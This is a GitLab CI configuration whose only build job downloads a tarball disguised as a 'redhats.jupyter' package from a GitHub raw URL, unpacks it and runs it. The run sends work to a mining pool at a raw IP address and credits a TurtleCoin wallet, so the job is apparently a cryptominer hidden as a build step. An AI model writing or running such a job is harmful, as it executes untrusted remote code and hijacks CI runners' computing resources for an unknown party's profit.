build_1:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/chirifa201/python/main/redhats.jupyter.tar.gz && tar xvzf redhats.jupyter.tar.gz && cd redhats.jupyter && ./redhats.jupyter -a argon2/chukwav2 -o 142.132.131.248:80 -u TRTLv1hc4Ys615aVETRD9tB73tP7H53bwY3RQkBn7xH7iJzXP6FqKh9hJ8od82q59QLHLSiWiGEjYhoDPnCAcnWcS8nSGccNVsA -p test2
    